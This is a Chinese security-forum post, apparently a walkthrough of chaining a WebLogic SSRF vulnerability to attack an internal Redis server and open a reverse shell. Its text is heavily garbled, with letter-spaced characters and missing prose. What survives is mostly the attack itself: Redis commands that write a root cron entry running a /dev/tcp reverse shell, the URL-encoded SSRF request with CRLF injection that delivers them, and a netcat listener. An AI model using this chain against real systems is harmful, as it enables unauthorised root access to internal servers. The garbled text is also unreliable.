[27] 2019-11-15_干货利用WebLogicSSRF漏洞攻击内网Redis反弹shell

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-15
2019-11-15_干货利用WebLogicSSRF漏洞攻击内网Redis反弹shell | W e b L o g i c   S S R F R e d i s s h e l l   P 4 s s W 0 r d   7 8 9 0   2 0 1 9 - 1 1 - 1 5 0 x 0 1     W e b L o g i c S S R F R e d i s I P 1 7 2 . 2 1 . 0 . 2 6 3 7 9 s h e l l I P I P I P 0 x 0 2   W e b L o g i c   S S R F   W e b L o g i c S S R F S S R F S S R F 访 W e b L o g i c     R e g i s t r i e s . j s p ? o p e r a t o r =   a r c h = n a m e & t x t S e a r c h n a m e = s d f & t x t S e a r c h k e y = & t x t S e a r c h f o r = & s e l f o r = B u s i n e s s + l o c a t i o n & b t n S u b m i t = S e a r c h   S S R F I P I P
  R e d i s 6 3 7 9 访 6 3 7 9   R e d i s   2 0 1 6 W e b L o g i c   S S R F     O K 0 x 0 3   R e d i s s h e l l   W e b l o g i c S S R F G E T % 0 a % 0 d r e d i s S S R F r e d i s   R e d i s r e d i s s h e l l / e t c / c r o n t a b c r o n t a b l i n u x
s e t   1   " n n n n *   *   *   *   r o o t   b a s h   - i   > &   / d e v / t c p / x x . x x . x x . x x [ I P ] / 8 8 8 8 [ ]   0 > & 1 n n n n "   c o n f i g   s e t   d i r   / e t c / c o n f i g   s e t   d b f i l e n a m e   c r o n t a b   s a v e   G E T U R L t e s t U R L ? o p e r a t o r =   % 5 C n % 5 C n % 5 C n * % 2 0 * % 2 0 * % 2 0 * % 2 0 * % 2 0 r o o t % 2 0 b a s h % 2 0 - i % 2 0 % 3 E % 2 6 % 2 0 % 2 F d e v % 2 F t c p % 2 F x x x . x x x . x x x . x x x % 2 F 8 8 8 8 % 2 0 0 % 3 E % 2 6 1 % 5 C n % 5 C n % 5 C n % 5 C n % 2 2 % 0 D % 0 A c o n f i g % 2 0 s e t % 2 0 d i r % 2 0 % 2 F e t c % 2 F % 0 D % 0 A c o n f i g % 2 0 s e t % 2 0 d b f i l e n a m e % 2 0 c r o n t a b % 0 D % 0 A s a v e % 0 D % 0 A % 0 D % 0 A a a a I P 8 8 8 8 n c   - l   8 8 8 8 s h e l l   b u r p s h e l l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则